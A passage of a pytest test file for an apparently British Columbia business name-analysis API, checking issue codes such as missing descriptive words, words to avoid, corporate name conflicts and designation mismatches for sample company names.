assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 3.- Unique word not classified in word_classification
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_not_classified_request_response(client, jwt, app):
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'UNCLASSIFIED INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 4.- Unique word classified as distinctive and descriptive
@pytest.mark.xfail(raises=ValueError)
def test_add_descriptive_word_both_classifications_request_response(client, jwt, app):
words_list_classification = [{'word': 'ABBOTSFORD’ ', 'classification': 'DIST'},
{'word': 'ABBOTSFORD’ ', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ABBOTSFORD INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD, payload.get('issues'))
# 5.- Successful well formed name:
@pytest.mark.xfail(raises=ValueError)
def test_successful_well_formed_request_response(client, jwt, app):
words_list_classification = [{'word': 'ADEA', 'classification': 'DIST'},
{'word': 'HEATING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ADEA HEATING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ABC PLUMBING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload status is Available")
assert ('Available', payload.get('status'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_one_word_to_avoid_request_response(client, jwt, app):
words_list_classification = [{'word': 'ABC', 'classification': 'DIST'},
{'word': 'INVESTIGATORS', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [{'words': 'ICPO, INTERPOL', 'consent_required': False, 'allow_use': False}]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ABC INTERPOL INVESTIGATORS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORDS_TO_AVOID, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_more_than_one_word_to_avoid_request_response(client, jwt, app):
words_list_classification = [{'word': 'CANADIAN', 'classification': 'DIST'},
{'word': 'CANADIAN', 'classification': 'DESC'},
{'word': 'NATIONAL', 'classification': 'DIST'},
{'word': 'NATIONAL', 'classification': 'DESC'},
{'word': 'INVESTIGATORS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [{'words': 'ICPO, INTERPOL', 'consent_required': False, 'allow_use': False},
{'words': 'CANADIAN NATIONAL, CN', 'consent_required': False,
'allow_use': False}]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'CANADIAN NATIONAL INTERPOL INVESTIGATORS INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.WORDS_TO_AVOID, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_too_many_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'MOUNTAIN', 'classification': 'DIST'},
{'word': 'MOUNTAIN', 'classification': 'DESC'},
{'word': 'VIEW', 'classification': 'DIST'},
{'word': 'VIEW', 'classification': 'DESC'},
{'word': 'FOOD', 'classification': 'DIST'},
{'word': 'FOOD', 'classification': 'DESC'},
{'word': 'GROWERS', 'classification': 'DIST'},
{'word': 'GROWERS', 'classification': 'DESC'},
{'word': 'CAFE', 'classification': 'DIST'},
{'word': 'CAFE', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'MOUNTAIN VIEW FOOD GROWERS & CAFE LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
for issue in payload.get('issues'):
# Make sure only Well Formed name issues are being returned
assert_issue_type_is_one_of([
AnalysisIssueCodes.ADD_DISTINCTIVE_WORD,
AnalysisIssueCodes.ADD_DESCRIPTIVE_WORD,
AnalysisIssueCodes.TOO_MANY_WORDS
], issue)
assert_has_issue_type(AnalysisIssueCodes.TOO_MANY_WORDS, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_unclassifiable_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'FINANCIAL', 'classification': 'DIST'},
{'word': 'FINANCIAL', 'classification': 'DESC'},
{'word': 'SOLUTIONS', 'classification': 'DIST'},
{'word': 'SOLUTIONS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'UNCLASSIFIED FINANCIAL SOLUTIONS INCORPORATED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.CONTAINS_UNCLASSIFIABLE_WORD, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_contains_unclassifiable_words_request_response(client, jwt, app):
words_list_classification = [{'word': 'CONSULTING', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'FLERKIN BLUBBLUB CONSULTING INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'FLERKIN BLUBBLUB BAKERY INC.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.CONTAINS_UNCLASSIFIABLE_WORD, payload.get('issues'))
@pytest.mark.parametrize("name, expected",
[
("ARMSTRONG PLUMBING LTD.", "ARMSTRONG PLUMBING & HEATING LTD."),
("ABC CONSULTING LTD.", "ABC INTERNATIONAL CONSULTING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DIST'},
{'word': 'CONSULTING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.',
'ABC PEST MANAGEMENT CONSULTING INC.', 'ABC ALWAYS BETTER CONSULTING INC.',
'ABC - AUTISM BEHAVIOUR CONSULTING INCORPORATED', 'ABC INTERNATIONAL CONSULTING LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
@pytest.mark.parametrize("name, expected",
[
("NO. 295 CATHEDRAL VENTURES LTD.", "CATHEDRAL HOLDINGS LTD."),
("NO. 295 SCS NO. 003 VENTURES LTD.", "SCS SOLUTIONS INC."),
("2000 ARMSTRONG -- PLUMBING 2020 LTD.", "ARMSTRONG PLUMBING & HEATING LTD."),
("ABC TWO PLUMBING ONE INC.", "ABC PLUMBING & HEATING LTD."),
("SCS HOLDINGS INC.", "SCS SOLUTIONS INC."),
("RE/MAX LUMBY INC.", "REMAX LUMBY"),
("RE MAX LUMBY INC.", "REMAX LUMBY"),
("468040 B.C. LTD.", "468040 BC LTD."),
("S, C & S HOLDINGS INC.", "SCS SOLUTIONS INC."),
("EQTEC ENGINEERING & SOLUTIONS LTD.", "EQTEC ENGINEERING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_strip_out_numbers_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'CATHEDRAL', 'classification': 'DIST'},
{'word': 'VENTURES', 'classification': 'DIST'},
{'word': 'VENTURES', 'classification': 'DESC'},
{'word': 'SCS', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'ABC', 'classification': 'DIST'},
{'word': 'HOLDINGS', 'classification': 'DIST'},
{'word': 'HOLDINGS', 'classification': 'DESC'},
{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'},
#{'word': '468040', 'classification': 'DIST'},
{'word': 'EQTEC', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'},
{'word': 'SOLUTIONS', 'classification': 'DIST'},
{'word': 'SOLUTIONS', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['CATHEDRAL VENTURES TRADING LTD.', 'CATHEDRAL HOLDINGS LTD.',
'SCS ENTERPRISES INTERNATIONAL', 'SCS SOLUTIONS INC.',
'ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.',
'ABC PLUMBING & HEATING LTD.', 'REMAX LUMBY', '468040 BC LTD.',
'EQTEC ENGINEERING LTD.', 'EQTEC SOLUTIONS LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
assert_additional_conflict_parameters(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst)
@pytest.mark.parametrize("name, expected",
[
("ARMSTRONG PLUMBING & HEATING LTD.", "ARMSTRONG PLUMBING & HEATING LTD.")
]
)
@pytest.mark.xfail(raises=ValueError)
def test_corporate_name_conflict_exact_match_request_response(client, jwt, app, name, expected):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'HEATING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
conflict_list_db = ['ARMSTRONG PLUMBING & HEATING LTD.', 'ARMSTRONG COOLING & WAREHOUSE LTD.']
save_words_list_name(conflict_list_db)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': name,
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
payload_lst = payload.get('issues')
assert_issues_count_is_gt(0, payload_lst)
assert_correct_conflict(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst, expected)
assert_additional_conflict_parameters(AnalysisIssueCodes.CORPORATE_CONFLICT, payload_lst)
@pytest.mark.xfail(raises=ValueError)
def test_name_requires_consent_compound_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'CANADIAN', 'classification': 'DIST'},
{'word': 'CANADIAN', 'classification': 'DESC'},
{'word': 'SUMMERS', 'classification': 'DIST'},
{'word': 'SUMMERS', 'classification': 'DESC'},
{'word': 'GAMES', 'classification': 'DIST'},
{'word': 'GAMES', 'classification': 'DESC'},
{'word': 'BLAKE', 'classification': 'DIST'},
{'word': 'BLAKE', 'classification': 'DESC'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'SUMMER GAMES, WINTER GAMES',
'consent_required': True, 'allow_use': True
},
{
'words': 'CONSULTING ENGINEER, ENGINEER, ENGINEERING, INGENIERE, INGENIEUR, INGENIEUR CONSIEL, P ENG, PROFESSIONAL ENGINEER',
'consent_required': True, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'CANADIAN SUMMERS GAMES LIMITED',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'BLAKE ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.NAME_REQUIRES_CONSENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_name_requires_consent_more_than_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'BLAKE', 'classification': 'DIST'},
{'word': 'BLAKE', 'classification': 'DESC'},
{'word': 'ENGINEERING', 'classification': 'DIST'},
{'word': 'ENGINEERING', 'classification': 'DESC'},
{'word': 'EQTEC', 'classification': 'DIST'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': '4H',
'consent_required': True, 'allow_use': True
},
{
'words': 'CONSULTING ENGINEER, ENGINEER, ENGINEERING, INGENIERE, INGENIEUR, INGENIEUR CONSIEL, P ENG, PROFESSIONAL ENGINEER',
'consent_required': True, 'allow_use': True
},
{
'words': 'HONEYWELL',
'consent_required': True, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'BLAKE 4H ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'EQTEC HONEYWELL ENGINEERING LTD.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.NAME_REQUIRES_CONSENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_existence_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_NON_EXISTENT, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_existence_incomplete_designation_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING SOCIETE A RESPONSABILITE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.TOO_MANY_WORDS, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'},
{'word': 'BC', 'classification': 'DIST'},
{'word': 'BC', 'classification': 'DESC'}
]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'B C, B C S, BC, BC S, BCPROVINCE, BRITISH COLUMBIA, BRITISHCOLUMBIA, PROVINCIAL',
'consent_required': False, 'allow_use': True
},
{
'words': 'CO OP, CO OPERATIVES, COOP, COOPERATIVES',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING COOP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING COOPERATIVE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': '468040 BC COOP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LLC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LLC PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LLP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SLR',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SENCRL',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING CCC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING ULC',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG LTD PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_one_word_with_hyphen_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
words_list_virtual_word_condition = [
{
'words': 'CO OP, CO OPERATIVES, COOP, COOPERATIVES',
'consent_required': False, 'allow_use': True
}
]
save_words_list_virtual_word_condition(words_list_virtual_word_condition)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG CO-OP PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG CO-OPERATIVE PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING L.L.C.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG L.L.C. PLUMBING',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY CO.',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_mismatch_more_than_one_word_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
headers = {'Authorization': 'Bearer ' + token, 'content-type': 'application/json'}
test_params = [
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING SOCIETE A RESPONSABILITE LIMITEE',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING LIMITED LIABILITY PARTNERSHIP',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING COMMUNITY CONTRIBUTION COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
},
{
'name': 'ARMSTRONG PLUMBING UNLIMITED LIABILITY COMPANY',
'location': 'BC',
'entity_type': 'CR',
'request_action': 'NEW'
}
]
for entry in test_params:
query = '&'.join("{!s}={}".format(k, quote_plus(v)) for (k, v) in entry.items())
path = ENDPOINT_PATH + '?' + query
print('\n' + 'request: ' + path + '\n')
response = client.get(path, headers=headers)
payload = jsonpickle.decode(response.data)
print("Assert that the payload contains issues")
if isinstance(payload.get('issues'), list):
assert_issues_count_is_gt(0, payload.get('issues'))
assert_has_issue_type(AnalysisIssueCodes.DESIGNATION_MISMATCH, payload.get('issues'))
@pytest.mark.xfail(raises=ValueError)
def test_designation_misplaced_request_response(client, jwt, app):
words_list_classification = [{'word': 'ARMSTRONG', 'classification': 'DIST'},
{'word': 'ARMSTRONG', 'classification': 'DESC'},
{'word': 'PLUMBING', 'classification': 'DIST'},
{'word': 'PLUMBING', 'classification': 'DESC'}]
save_words_list_classification(words_list_classification)
# create JWT & setup header with a Bearer Token using the JWT
token = jwt.create_jwt(claims, token_header)
